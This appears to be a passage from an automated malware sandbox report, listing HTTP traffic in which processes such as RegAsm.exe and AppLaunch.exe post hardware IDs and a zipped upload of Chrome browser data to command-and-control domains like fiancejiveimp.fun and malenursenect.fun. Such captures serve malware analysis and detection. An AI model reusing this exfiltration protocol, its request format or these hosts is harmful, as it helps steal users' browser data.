                                                                    Set-Cookie: PHPSESSID=h2kgv49354m9ied7h79fv2hejl; expires=Sat, 27 Jan 2024 01:41:59 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:20 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L0PP46aqHTBph%2FeNsPtdJIR4WENFDtwWQTxf5XlS%2FrYs%2BlgH1mpdpFtYoW6if3GXM36rP7HuHNb%2FBRIGGQxlGo8T2omvDbIhHXwXiqtH5WRToS%2Fat75MqcvUPeHKTx5Npi7A9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f4b9a4c1fd6-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:20.598525047 CEST6261INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    29192.168.2.349863104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:20.820481062 CEST6262OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:20.820866108 CEST6263OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:21.159193039 CEST6266INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=rjn860o2t15po86keh7dgudeud; expires=Sat, 27 Jan 2024 01:42:00 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:21 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b6kDt0Q5Ugs0GMmelLBEUCfCX6VsTbAyahdYhDYct6A0M%2Fq02rvL9xEuv8DUyXLGGGIzkFFJ6fyNa9FlglAqMIUJVXWFS7Y1FwV9SrDMvcvFZS2F%2Facp89C1dofk8iVLFln0kA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f4f58a907d7-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:21.159261942 CEST6267INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    3192.168.2.349806211.181.24.13380C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:54:24.212740898 CEST1539OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://cqexxjno.net/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 168
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:54:24.212742090 CEST1540OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 6e 0d f8 f0
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vunqBl|gSV&{l2W>-0x22)[[,r](nNZ
                                                                    Oct 3, 2023 09:54:25.387819052 CEST1540INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:54:24 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    30192.168.2.349864172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:20.960655928 CEST6265OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:20.961095095 CEST6265OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:21.278683901 CEST6268INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=5sm3cg666th1sekm4a0ktptruu; expires=Sat, 27 Jan 2024 01:42:00 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:21 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uqQWbmeREzPYqluRX0BymIig9%2BKgCzuo%2B5QAe1Al6zVzKHoz3rehwPefqNgtKtM%2FkprpoY5%2FkiS8qoclx3M7FP%2BjUY9FTFZVxP5B8W5MwotwBESgHzS2Twk3U3TYe8V%2BKd63lQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f503a8b20ca-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:21.278801918 CEST6268INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    31192.168.2.349865104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:21.506994963 CEST6269OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:21.506994963 CEST6269OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:21.929795027 CEST6359INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=4emb3uevo1qc9f9254sr70jj73; expires=Sat, 27 Jan 2024 01:42:00 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:21 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vXiU5l23pb4VwHqQDH5KTjtVVHVZjNJhgQK0Y1v5eN8c6vnPQO4RCNWBWlHRyVy6u6MKDlsJKqg4bXny%2BhhTzaI3cN0n%2FwmhzSwIaQ5QzPZF3IrrMthT16Shm4L7PQ1lL2uvqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f53af8c6ffd-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:21.929857969 CEST6359INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    32192.168.2.349866172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:21.558842897 CEST6270OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 86372
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:21.559259892 CEST6281OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:21.653593063 CEST6283OUTData Raw: 70 3b 49 e3 b5 5b c7 ba ad 33 55 f7 c0 d5 84 5a 6b 19 a3 aa fa 60 54 88 65 ad 29 d1 b2 74 cb 52 44 85 e0 e4 c6 97 cc aa 1d a7 b6 53 28 3c 4a 07 3c e2 65 4c 13 42 bc 05 9e ec d9 c4 03 de 02 0f 40 02 1e 20 f1 0c c1 13 ee ec 34 89 13 67 6d 11 d3 34
                                                                    Data Ascii: p;I[3UZk`Te)tRDS(<J<eLB@ 4gm4H}>S+K)A"Bfs[k6xq&'{Zz"HKOx)\W,Ion[Q391}e&|oy'~*HO?xW
                                                                    Oct 3, 2023 09:55:21.654036045 CEST6285OUTData Raw: a4 ea b4 58 08 b6 1b 4f 6c 35 8d 67 4c 78 84 d1 ae e8 5e 07 77 a2 aa ea b9 ac fc 96 3c aa 1d c3 46 58 0c 3e 2e f8 67 25 79 45 15 db 53 c1 3a 16 4e a4 2c 98 c7 23 f9 24 cc cc 26 4d a8 d7 0d f9 05 4b 53 91 26 1d 51 84 b7 6e b4 58 df 14 8a 7a 70 fb
                                                                    Data Ascii: XOl5gLx^w<FX>.g%yES:N,#$&MKS&QnXzp$Kg#>nLk`pWIgu('U]m2]~?-Gv3UT'W,n6-.CW'/.s(|xze9zK
                                                                    Oct 3, 2023 09:55:21.654151917 CEST6288OUTData Raw: 95 c3 9d 46 f5 d0 ca 7a bf 78 df 5b 68 ac 75 e4 55 3f 39 b8 b7 72 b6 6c 07 63 b5 d5 4e f2 62 bb af 47 6d 23 93 fc da bb 74 f4 09 d9 46 26 f5 70 2b 4a b7 5e df 63 24 8d 76 bd e9 07 c6 7e e3 ee 8b 21 5f ec c2 17 d3 d6 6e f0 f7 21 b5 66 b9 cf eb 4f
                                                                    Data Ascii: Fzx[huU?9rlcNbGm#tF&p+J^c$v~!_n!fO2/v/8v.SDnT_yP[T}&z?562.?ZiQq[}R|@p]|d1_AuG;5SGw.Y9oo'
                                                                    Oct 3, 2023 09:55:21.654166937 CEST6291OUTData Raw: 62 39 b6 b0 62 99 9c 99 8e ec aa 51 60 f3 3c 77 b3 0a 12 ae 51 88 15 84 0c 57 6b b7 56 96 e7 12 9c 70 95 4b c6 e2 1b 05 4e da 5d 5e 10 0b 6c ba 59 21 56 5c 68 a0 33 c9 66 79 2e 1f 2b 6c e4 1a 14 0a d9 02 97 cf 17 73 85 58 9e 63 25 31 bb bb c6 0a
                                                                    Data Ascii: b9bQ`<wQWkVpKN]^lY!V\h3fy.+lsXc%1+X3mM6\r<JHpBJ6m#p+o^PUJe`1neY|yfI!%p4fqrz<*k^bUEs$le<<,N.XN
                                                                    Oct 3, 2023 09:55:21.654212952 CEST6293OUTData Raw: 0e bf 21 e6 71 74 05 2f 50 71 b0 51 48 91 3d 23 de d4 0c 61 4d 57 c7 6e 31 d8 58 0d 19 93 41 67 10 8f 8a 8d 1e 74 7a c5 06 32 76 4d c2 42 c5 9b 6c 36 6f 40 f0 f8 6c 1e a7 87 5e 75 ac fa 70 71 d5 df 6a 75 b0 4c e0 70 4e f6 ba a1 95 34 ee e2 90 c4
                                                                    Data Ascii: !qt/PqQH=#aMWn1XAgtz2vMBl6o@l^upqjuLpN4-nTf5nM\R"Mbz3tA[BoafxVW,)pl!%1UZzR7Wxxsn?uFF=74cED&1&x!/f3Nqip
                                                                    Oct 3, 2023 09:55:21.654269934 CEST6296OUTData Raw: e3 19 f1 d6 39 9e d3 8d 92 f6 c0 be 5f d1 49 5a 68 fb c1 ce 65 7f 46 cb 05 ff d9 09 67 40 10 af 0e f1 cd 97 98 66 bb c9 61 39 be a7 54 ea 9a 5c 31 f7 35 cb 73 38 d6 2a c0 e5 d5 eb 4b df 96 62 d5 a5 b5 d5 b6 a3 34 46 5d c7 25 9f 73 6e 55 c8 88 a3
                                                                    Data Ascii: 9_IZheFg@fa9T\15s8*Kb4F]%snUCvw@|@oX)>3j,VrBVIH*3#5s(k| r|&#.n;o7 -|scjlkOp/wdo"]n\_F=@0r!p_)g1j
                                                                    Oct 3, 2023 09:55:21.654371023 CEST6299OUTData Raw: 14 b5 6d e2 c9 1b f1 31 23 73 7e fb 61 d4 d0 9a ac 5a 9a 42 cd a8 75 1b 1d ab db ae a9 39 bf cd b6 8e 2b 6b 5a 64 ad d5 b6 74 2c e5 b5 26 02 81 80 c8 cc a1 66 d6 ea 15 1a 9e 1e 15 54 2b 12 72 b1 21 d7 cc 8a ae 36 22 74 c8 ec c6 a1 46 bb c8 0c 27
                                                                    Data Ascii: m1#s~aZBu9+kZdt,&fT+r!6"tF'2vg~M)A%=u*>F/Ito{Jz@,-{:E&ELnMfCVjzn](!u7:% F+8?;Htj2i2[S3N~&piIcnY
                                                                    Oct 3, 2023 09:55:21.654402018 CEST6301OUTData Raw: 05 b2 74 0f f7 cc f8 b1 1f b7 55 bf f2 39 cc 5b bf a8 b4 94 e7 ca f2 0c 38 16 d9 b2 af cb 6b 25 f4 8c 40 9f e5 d8 bc 6d af 51 77 ed 3c 9d de 38 bf 6d eb f5 5e 8a 5b aa fe 19 47 0e 0c 6f 3a 69 e8 e0 15 1f 72 f0 b3 a3 17 3f 64 8b 74 12 3f 2a da 8e
                                                                    Data Ascii: tU9[8k%@mQw<8m^[Go:ir?dt?*0 xZjND('"aQDr<x0O+Lmb)08^g9L>[d&W^ ^-3*e|/b}iDXbocr]M|O*pqHU0R
                                                                    Oct 3, 2023 09:55:21.654495955 CEST6304OUTData Raw: 91 29 a3 0c 4b 0b bc 19 da c8 66 06 af a5 20 79 10 f2 96 97 35 b5 12 ed ce b0 72 c0 5b f1 78 a7 18 92 ba fd f8 68 9b 20 ad 10 e3 cf 5b 0e 8d c3 d3 04 de 6a 65 28 23 80 81 ff b7 be 81 bf ee 6f 8d e7 21 8f 12 c5 78 c6 31 63 fc 7f 01 50 4b 07 08 ab
                                                                    Data Ascii: )Kf y5r[xh [je(#o!x1cPK2WBpPKNCW#Chrome/Default/BrowserDB/000005.ldbXS&X`%!A!&B@D]@`25@d\R\-K-lll
                                                                    Oct 3, 2023 09:55:22.355128050 CEST6362INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=ru284k17ofho72rp1b272lt56u; expires=Sat, 27 Jan 2024 01:42:01 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:22 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BigkTs1V5DrPQ44xkx4D5MNTY5tOHYAlphYkwTuQeYAWI8nNf1zBCtlzv5KN9oaq5Q6fiWoS%2F%2BHJe65Yxn%2BFvhSK2iNLDu%2FhsColync9L61DLAI6UmUThmDpGSFr%2BI%2F0qz0o0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f53ff490823-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:22.355194092 CEST6362INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    33192.168.2.349867104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:22.142316103 CEST6360OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:22.142888069 CEST6361OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:22.519377947 CEST6363INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=pjq3p6ud9oqkeno9dnvff8t7vl; expires=Sat, 27 Jan 2024 01:42:01 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:22 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=raToWaoDks6e60axct4Kc8RGclFGC4%2Beyf%2FfcnZyGPh8AxIPROVtrwJMWO0GjFR0EhMj4niARMFyFKwSgSTqANsWeEoSISLnzpYgDMAn0P8He8HIr7J0qzr%2BbEQJCY%2BhpOMb9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f579a2f82a5-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:22.519445896 CEST6364INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    34192.168.2.349868172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:22.566247940 CEST6364OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:22.566247940 CEST6365OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:22.893357038 CEST6367INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=sms40lma384d4llc6oqrgu0tfm; expires=Sat, 27 Jan 2024 01:42:01 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:22 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wiCu0NAhyKymB5Duc%2BgoDyVf6Z9AzqW3RKi2MIs%2Felb06PryR5J3yNtiLAiEpUoieEOcphCnjQtH9GiCnuEJuGRWvVqWtMmAJ0EhMoG8F6OI6EoXh5CeQqp6qJgYZwZnI%2Fkr5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f5a4a055979-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
